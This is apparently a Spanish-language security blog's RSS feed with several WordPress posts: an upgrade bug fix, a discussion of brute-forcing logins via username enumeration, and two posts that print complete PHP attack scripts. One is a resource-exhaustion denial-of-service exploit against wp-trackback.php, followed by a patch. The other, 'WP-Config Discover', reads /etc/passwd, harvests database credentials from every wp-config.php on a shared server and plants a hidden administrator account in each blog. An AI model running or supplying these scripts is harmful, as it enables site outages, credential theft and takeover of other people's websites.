El rincón de Zerial » wp http://blog.zerial.org Informática, GNU/Linux, Seguridad, Hacking, Programación, Ocio Tue, 20 Jul 2010 18:13:34 +0000 en hourly 1 http://wordpress.org/?v=3.0 Error de actualización desde WordPress 2.8 a 2.9 http://blog.zerial.org/tips/error-de-actualizacion-desde-wordpress-2-8-a-2-9/ http://blog.zerial.org/tips/error-de-actualizacion-desde-wordpress-2-8-a-2-9/#comments Sat, 19 Dec 2009 20:51:13 +0000 Zerial http://blog.zerial.org/?p=1272

Hace un rato que actualicé la versión de wordpress de mi blog junto a otros wordpress que administro, pero sólo mi versión tuvo un problema. Me mostraba todas las páginas en blanco. Al parecer no soy el único que tuvo ese problema, ya que puedo ver en distintos sitios a mucha gente que le ocurre lo mismo:

http://es.wordpress.org/2009/12/19/error-de-pagina-en-blanco-tras-actualizar
http://ayudawordpress.com/wordpress-2-9-espanol-ya-disponible/

Algunos hablan de hacer un downgrade y otros hablan de volver a instalar wordpress. Pues yo me di el trabajo de depurar el problema y determinar que archivo era el que estaba generando conflictos.
Al actualizar a wordpress 2.9, al parecerno se está actualizando correctamente el fichero wp-includes/functions.php.

¿Qué hice para solucionarlo?
Simplemente me descargué la nueva versión de WordPress (en español o en inglés) y copié el fichero hacia mi instalación.

Actualización: Se ha publicado una version 2.9.1 Beta 1 donde corrigen, entre otras cosas, éste error.

Delicious Twitter Facebook Google Bookmarks FriendFeed Digg Slashdot Compartir/Guardar

]]> http://blog.zerial.org/tips/error-de-actualizacion-desde-wordpress-2-8-a-2-9/feed/ 8 Ataque de fuerza bruta a WordPress http://blog.zerial.org/seguridad/ataque-de-fuerza-bruta-a-wordpress/ http://blog.zerial.org/seguridad/ataque-de-fuerza-bruta-a-wordpress/#comments Mon, 07 Dec 2009 12:29:07 +0000 Zerial http://blog.zerial.org/?p=1175 bruteforceLos ataques por fuerza bruta a instalaciones WordPress son un tanto faciles, ya que es muy sencillo determinar los usuarios del sistema y no tiene sistemas de protección de Throttling Login Attempts o límite de intentos de ingreso, lo cual nos permite hacer éste tipo de ataques.
Determinar los nombres de usuarios es tan sencillo como escribir algún supuesto usuario y llenar el campo de contraseña con cualquier información, cuando presionemos “Iniciar Sesion” el sistema nos dirá “Usuario incorrecto” si es que el usuario no existe o bien “Password incorrecta“, en el caso que el usuario si exista y el password sea invlálido. Con un ataque distribuido es posible obtener el password de un usuario en particular muy sencillamente, sólo es cosa de tiempo.
Si pensamos hacerlo de forma remota puede que nos tardemos un poco más, pero pensemos desde el mismo lado del servidor, imaginemosnos que tenemos una cuenta en el hosting donde está hospedado el CMS, será todo mucho más fácil y más rápido.

pwnpressHace un tiempo, yo publiqué un script en php bastante sencillo que nos permitía hacer ésto en simples pasos leyendo palabras desde un diccionario, lo interesante de éste script es que no sólo funciona con wordpress, sino con cualquier weblogin “simple” e inseguro. Luego encontré un artículo relacionado muy interesante, que hablaba sobre estos tipos de ataques y analizaban un script que encontraron en un servidor, el cual era mucho mas sofisticado y trabajado que el mio, permitia hacer ataques distribuidos desde distintas máquinas y de esta forma aumentar si desempeño más de un 1000% (sí, mil por ciento).

Su funcionamiento (copy&paste):

La funcion wp_brute_attempt() toma 3 parámetros, $ch que es la estuctura cURL (cURL es una herramienta de línea de comando que se puede usar para realizar peticiones HTTP ). Los otros dos parámetros definen el sitio y la contraseña que se intentará. Si el script consigue validarse exitosamente, la página que es devuelta por el servidor contendrá la frase “Log Out”, y la función devolverá el valor verdadero.

Ahora, lo interesante del script es que permite el cracking distribuido. La información es guardada en una base de datos MySQL y el script realmente se conecta en forma directa a la base de datos principal. Esto permite al atacante correr varios scripts simultáneos – cada uno de ellos tomará 200 URL nuevas y las marcará con el ID del script forzador ($colo)

Encuentro súper interesante lo que se hizo y de la forma en que fue pensado, la próxima véz que se me ocurra hacer algo así, lo hare distribuido usando una base de datos accesible remotamente para aumentar el rendimiento y desempeño del script. Si lo llego a hacer, publicaré una prueba de concepto con los resultados.

Fuente en español: Segu-Info

Delicious Twitter Facebook Google Bookmarks FriendFeed Digg Slashdot Compartir/Guardar

]]> http://blog.zerial.org/seguridad/ataque-de-fuerza-bruta-a-wordpress/feed/ 4 FPD en WordPress no es considerado un error http://blog.zerial.org/seguridad/fpd-en-wordpress-no-es-considerado-un-error/ http://blog.zerial.org/seguridad/fpd-en-wordpress-no-es-considerado-un-error/#comments Sat, 14 Nov 2009 15:42:15 +0000 Zerial http://blog.zerial.org/?p=1100 Como recordarán, hace unos días publiqué dos artículos sobre una vulnerabilidad Full Path Disclosure en WordPress, que afectaba a los plugins y a los archivos propios del CMS. Luego de unas semanas de haberlo reportado recibí una respuesta:

We consider path disclosures a server configuration error. WordPress
files don’t protect against disclosing paths when directly loaded.

En otras palabras, no es considerado un error o una vulnerabilidad ya que corresponde a un problema de configuración del servidor.
Pueden leer un hilo donde se discute sobre el tema.

Delicious Twitter Facebook Google Bookmarks FriendFeed Digg Slashdot Compartir/Guardar

]]> http://blog.zerial.org/seguridad/fpd-en-wordpress-no-es-considerado-un-error/feed/ 0 Denial-of-Service (DoS) rápido y de una forma muy sencilla en WordPress http://blog.zerial.org/seguridad/denial-of-service-dos-rapido-y-de-una-forma-muy-sencilla-en-wordpress/ http://blog.zerial.org/seguridad/denial-of-service-dos-rapido-y-de-una-forma-muy-sencilla-en-wordpress/#comments Sun, 18 Oct 2009 13:50:59 +0000 Zerial http://blog.zerial.org/?p=1014 pwnpressjcarlosn ha descubierto una vulnerabilidad en el fichero wp-trackbacks.php de wordpress, la cual nos permitiría hacer un tipo de denegación de servicio (DoS) con unas cuantas peticiones y sin necesidad de botnets o maquinas zombies.
Como él mismo nos cuenta:

Este error, es explotable desde cualquier conexión a internet, y no requiere de ordenadores zombies, ni de nada, son sólo 20 peticiones a lo sumo, desde una línea ADSL convencional, para dejar K.O. a cualquier servidor que hospede un blog basado en wordpress.

El problema fue reportado a la seguridad en wordpress.com y no se obtuvo respuesta, luego se intentó comunicar con el creador de wordpress y al pasar un par de días, obtuvo una respuesta de que lo solucionarán en algún momento pero no de la forma que él proponia, sino que ellos mismos buscarán cómo hacerlo.
La misma persona que hizo público este bug, publicó un exploit y una posible solución.

El exploit:

  1. < ?php
  2.     //wordpress Resource exhaustion Exploit
  3.     //http://rooibo.wordpress.com/
  4.     //security@wordpress.org contacted and get a response,
  5.     //but no solution available.
  6.     if(count($argv) < 2) {
  7.     echo “You need to specify a url to attack\n”;
  8.     exit;
  9.     }
  10.  
  11.     $url = $argv[1];
  12.  
  13.     $data = parse_url($url);
  14.     if(count($data) < 2) {
  15.     echo “The url should have http:// in front of it, and should be complete.\n”;
  16.     exit;
  17.     }
  18.  
  19.     if(count($data) == 2) {
  20.     $path = ”;
  21.     } else {
  22.     $path = $data[‘path’];
  23.     }
  24.     $path = trim($path,’/‘);
  25.    $path .= ‘/wp-trackback.php’;
  26.    if($path{0} != ‘/’) {
  27.    $path = ‘/’.$path;
  28.    }
  29.  
  30.    $b = “”;
  31.    $b = str_pad($b,140000,’ABCEDFG’);
  32.    $b = utf8_encode($b);
  33.    $charset = “”;
  34.    $charset = str_pad($charset,140000,”UTF-8,”);
  35.  
  36.    $str = ‘charset=’.urlencode($charset);
  37.    $str .= ‘&url=www.example.com’;
  38.    $str .= ‘&title=’.$b;
  39.    $str .= ‘&blog_name=lol’;
  40.    $str .= ‘&excerpt=lol’;
  41.  
  42.    $count = 0;
  43.    while(1) {
  44.    $fp = @fsockopen($data['host'],80);
  45.    if(!$fp) {
  46.    if($count > 0) {
  47.    echo “down!!!!\n”;
  48.    exit;
  49.    }
  50.    echo “unable to connect to: “.$data['host'].”\n”;
  51.    exit;
  52.    }
  53.  
  54.    fputs($fp, “POST $path HTTP/1.1\r\n”);
  55.    fputs($fp, “Host: “.$data['host'].”\r\n”);
  56.    fputs($fp, “Content-type: application/x-www-form-urlencoded\r\n”);
  57.    fputs($fp, “Content-length: “.strlen($str).”\r\n”);
  58.    fputs($fp, “Connection: close\r\n\r\n”);
  59.    fputs($fp, $str.”\r\n\r\n”);
  60.  
  61.    echo “hit!\n”;
  62.    $count++;
  63.    }
  64.  
  65.    ?>

La solución:

Cambiar

  1. $charset = $_POST[‘charset’];

Por

  1. $charset = str_replace(”,”,”",$_POST['charset']);
  2. if(is_array($charset)) { exit; }

Delicious Twitter Facebook Google Bookmarks FriendFeed Digg Slashdot Compartir/Guardar

]]> http://blog.zerial.org/seguridad/denial-of-service-dos-rapido-y-de-una-forma-muy-sencilla-en-wordpress/feed/ 1 WP-Config Discover: Héchale un vistazo a todos los WordPress del servidor http://blog.zerial.org/seguridad/wp-config-discover/ http://blog.zerial.org/seguridad/wp-config-discover/#comments Mon, 10 Aug 2009 03:04:08 +0000 Zerial http://blog.zerial.org/?p=716 matrixwordpressWP-Config Discover es el nombre que le puse a un script/exploit en el que estuve trabajando durante la semana. Este script no se aprovecha de ninguna falla ni vulnerabilidad de wordpress ni de algun servicio en especifico, sino de algo que es completamente normal: Lectura para el usuario www-data sobre el fichero wp-config.php.

Como todos saben, wordpress al igual que todos los cms, guardan la configuración de la base de datos (usuario, password, host, prefijo de las tablas, etc) en un fichero, el cual debe ser legible por el usuario que está corriendo el servicio http (generalmente apache/www-data).

Código

  1. < ?php
  2. $paths = array(
  3.     "blog",
  4.     "site",
  5.     "html",
  6.     "www",
  7.     "html/blog",
  8.     "www/blog",
  9.     "site/blog",
  10.     "wordpress",
  11.     "wp",
  12.     "www/wp",
  13.     "www/wordpress",
  14.     "html/wordpress",
  15.     "html/wp",
  16.     "public_html",
  17.     "public_html/blog",
  18.     "public_html/wp",
  19.     "public_html/wordpress",
  20. );
  21. $files = array(
  22.     "wp-config.php",
  23. );
  24. print "Checking for ….\n";
  25. if(!is_readable("/etc/passwd"))    die("err0r: can’t read /etc/passwd (safe mode?)");
  26. $_f = @file("/etc/passwd");
  27. foreach($_f as $usr){
  28.     $usr = explode(":", $usr);
  29.     $uid = $usr[2];
  30.     $home = $usr[5];
  31.     $usr = $usr[0];
  32.     if($uid >= 1000){
  33.         print $usr." (uid:".$uid."): ".$home."\n";
  34.         foreach($paths as $path){
  35.             if(file_exists($home."/".$path)) {
  36.             print "\tSearching in ".$home."/".$path."\n";
  37.                 foreach($files as $file){
  38.                     if(file_exists($home."/".$path."/".$file)){
  39.                          print "\t\tFound: ".$file."\n";
  40.                         $__f = @file($home."/".$path."/".$file);
  41.                         foreach($__f as $line){
  42.                             if(stristr($line, "DB_USER")) { preg_match_all(‘/define\(\’(.*)\);/’, $line, $output); print "\t\t\t".str_replace("DB_USER’, ","usr=>", $output[1][0])."\n"; }
  43.                             if(stristr($line, "DB_PASSWORD")) { preg_match_all(‘/define\(\’(.*)\);/’, $line, $output2); print "\t\t\t".str_replace("DB_PASSWORD’, ", "pwd=>", $output2[1][0])."\n"; }
  44.                             if(stristr($line, "DB_NAME")) { preg_match_all(‘/define\(\’(.*)\);/’, $line, $output3); print "\t\t\t".str_replace("DB_NAME’, ", "db=>", $output3[1][0])."\n"; }
  45.                             if(stristr($line, "DB_HOST")) { preg_match_all(‘/define\(\’(.*)\);/’, $line, $output4); print "\t\t\t".str_replace("DB_HOST’, ", "host=>", $output4[1][0])."\n"; }
  46.                             if(stristr($line, "\$table_prefix")) { preg_match_all(‘/\$table_prefix(.*);/’, $line, $output5); print "\t\t\tprefix".$output5[1][0]."\n"; }
  47.                             flush();
  48.                         }
  49.                         print "\t\t\tURL: ".getURL($output[1][0], $output2[1][0], $output3[1][0], $output4[1][0], $output5[1][0])."\n";
  50.                         if($_GET[‘attack’] == "create_user") print "\t\t\tUser/pass created: ".UserAdmin("create", $output[1][0], $output2[1][0], $output3[1][0], $output4[1][0], $output5[1][0])."\n";
  51.                         if($_GET[‘attack’] == "delete_user") print "\t\t\tfakeadmin deleted: ".UserAdmin("delete", $output[1][0], $output2[1][0], $output3[1][0], $output4[1][0], $output5[1][0])."\n";
  52.                         flush();
  53.                     }
  54.                 }
  55.             }
  56.             flush();
  57.         }
  58.         flush();
  59.     }
  60. }
  61. function getURL($user, $pass, $db, $host, $prefix){
  62.     preg_match_all(‘/, \’(.*)\’/’, $user, $user); $user = $user[1][0];
  63.     preg_match_all(‘/, \’(.*)\’/’, $pass, $pass); $pass = $pass[1][0];
  64.     preg_match_all(‘/, \’(.*)\’/’, $db, $db); $db = $db[1][0];
  65.     preg_match_all(‘/, \’(.*)\’/’, $host, $host); $host = $host[1][0];
  66.     preg_match_all(‘/\’(.*)\’/’, $prefix, $prefix); $prefix = $prefix[1][0];
  67.     $sql = @mysql_connect($host, $user, $pass);
  68.     @mysql_select_db($db);
  69.     $_q = @mysql_query("SELECT option_value FROM ".$prefix."options WHERE option_name=’siteurl’", $sql);
  70.     @mysql_close($sql);
  71.     return @mysql_result($_q, 0, ‘option_value’);
  72. }
  73.  
  74. function UserAdmin($action, $user, $pass, $db, $host, $prefix){
  75.         preg_match_all(‘/, \’(.*)\’/’, $user, $user); $user = $user[1][0];
  76.         preg_match_all(‘/, \’(.*)\’/’, $pass, $pass); $pass = $pass[1][0];
  77.         preg_match_all(‘/, \’(.*)\’/’, $db, $db); $db = $db[1][0];
  78.         preg_match_all(‘/, \’(.*)\’/’, $host, $host); $host = $host[1][0];
  79.         preg_match_all(‘/\’(.*)\’/’, $prefix, $prefix); $prefix = $prefix[1][0];
  80.         $sql = @mysql_connect($host, $user, $pass);
  81.         @mysql_select_db($db);
  82.     if($action == "create"){
  83.         $wp_uid = rand(9990,99999);
  84.         @mysql_query("INSERT INTO ".$prefix."users(id, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name) VALUES(".$wp_uid.", ‘fakeadmin’, md5(‘dummie’), ‘wordpress’, ‘dummie@wordpress.cl’, ‘http://’, NOW(), ”, 0, ‘wordpressdummieadmin’)", $sql);
  85.         @mysql_query("INSERT INTO ".$prefix."usermeta (user_id, meta_key, meta_value) VALUES (".$wp_uid.", ‘wp_capabilities’, ‘a:1:{s:13:\"administrator\";b:1;}’ )", $sql);
  86.     }
  87.     if($action == "delete"){
  88.         mysql_query("DELETE FROM ".$prefix."usermeta WHERE user_id=(SELECT id FROM ".$prefix."users WHERE user_login=’fakeadmin’)", $sql);
  89.         mysql_query("DELETE FROM ".$prefix."users WHERE user_login=’fakeadmin’", $sql);
  90.     }
  91.     @mysql_close($sql);
  92.     return "fakeadmin/dummie";
  93. }
  94. ?>

Este script tiene dos funciones embedidas, las cuales se deben llamar pasando pasando las variables attack=create_user o attack=delete_user. La primera crea un usuario admin (falso) en todos los wordpress y con la segunda, se eliminan estos usuarios creados.

Conceptualmente es un script muy sencillo pero en un servidor sin protecciones podría ser mortal.

El código está disponible tambien en http://codes.zerial.org/php/wp-config_discover.phps

nota: queda de más decir que es para uso educativo y es una herramienta de auditoría :)

Delicious Twitter Facebook Google Bookmarks FriendFeed Digg Slashdot Compartir/Guardar

]]> http://blog.zerial.org/seguridad/wp-config-discover/feed/ 2